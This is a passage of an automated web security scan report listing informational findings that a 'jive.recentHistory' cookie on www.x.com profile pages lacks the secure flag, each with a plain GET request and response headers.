<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.195. https://www.x.com/people/amypiazza00

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/amypiazza00

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/amypiazza00 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c36303039313b332c3133383538323b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=166730 t=1313157109973921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.196. https://www.x.com/people/angelleye

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/angelleye

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/angelleye HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=188523 t=1313157134358773
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.197. https://www.x.com/people/billday

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/billday

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/billday HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:35 GMT; Path=/
Vary: User-Agent
JP: D=155484 t=1313157155442148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.198. https://www.x.com/people/blingnation2010

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/blingnation2010

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/blingnation2010 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:57 GMT; Path=/
Vary: User-Agent
JP: D=82638 t=1313157117852719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.199. https://www.x.com/people/bryngregory

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/bryngregory

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/bryngregory HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:49 GMT; Path=/
Vary: User-Agent
JP: D=142323 t=1313157169831259
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.200. https://www.x.com/people/das_licht

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/das_licht

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/das_licht HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=93807 t=1313157132393620
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.201. https://www.x.com/people/dchankhour

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/dchankhour

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/dchankhour HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:44 GMT; Path=/
Vary: User-Agent
JP: D=75356 t=1313157164475506
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.202. https://www.x.com/people/eferreira

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/eferreira

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/eferreira HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=84607 t=1313157130615032
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.203. https://www.x.com/people/encore

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/encore

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/encore HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c31303939373b332c3133363236393b332c31323739393b332c323839313b332c323430323b332c3133313833303b332c323032353b; Expires=Sun, 11-Sep-2011 13:52:17 GMT; Path=/
Vary: User-Agent
JP: D=147969 t=1313157137124462
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.204. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:48 GMT; Path=/
Vary: User-Agent
JP: D=175267 t=1313157108233489
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.205. https://www.x.com/people/gazugafan

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gazugafan

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/gazugafan HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=78479 t=1313157133485041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.206. https://www.x.com/people/gem

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gem

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/gem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:53 GMT; Path=/
Vary: User-Agent
JP: D=130479 t=1313157173386719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.207. https://www.x.com/people/gogoeric

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gogoeric

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/gogoeric HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:59 GMT; Path=/
Vary: User-Agent
JP: D=166431 t=1313157119718400
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.208. https://www.x.com/people/hotellina

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/hotellina

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/hotellina HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=239357 t=1313157149186681
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.209. https://www.x.com/people/iConcessionStand

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/iConcessionStand

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/iConcessionStand HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:01 GMT; Path=/
Vary: User-Agent
JP: D=158386 t=1313157121449840
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.210. https://www.x.com/people/joncas

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/joncas

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/joncas HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:46 GMT; Path=/
Vary: User-Agent
JP: D=77890 t=1313157166303738
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.211. https://www.x.com/people/lwhite2104

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/lwhite2104

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/lwhite2104 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:51 GMT; Path=/
Vary: User-Agent
JP: D=79758 t=1313157171575959
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.212. https://www.x.com/people/mandeheritage

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/mandeheritage

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/mandeheritage HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=79098 t=1313157131216875
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.213. https://www.x.com/people/odeskdev

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/odeskdev

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/odeskdev HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b332c35373137393b332c3133363935343b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:51:56 GMT; Path=/
Vary: User-Agent
JP: D=77481 t=1313157116029628
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.214. https://www.x.com/people/omuleanu

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/omuleanu

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/omuleanu HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:42 GMT; Path=/
Vary: User-Agent
JP: D=161006 t=1313157162705096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.215. https://www.x.com/people/pluto26

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/pluto26

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/pluto26 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:40 GMT; Path=/
Vary: User-Agent
JP: D=76607 t=1313157160904760
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.216. https://www.x.com/people/posiden5665

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/posiden5665

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/posiden5665 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=81038 t=1313157130321120
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.217. https://www.x.com/people/ramonmorales123

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ramonmorales123

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/ramonmorales123 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=87382 t=1313157130920019
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.218. https://www.x.com/people/rizkygarut

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/rizkygarut

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/rizkygarut HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78953 t=1313157110910504
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.219. https://www.x.com/people/roguereptile

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/roguereptile

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/roguereptile HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
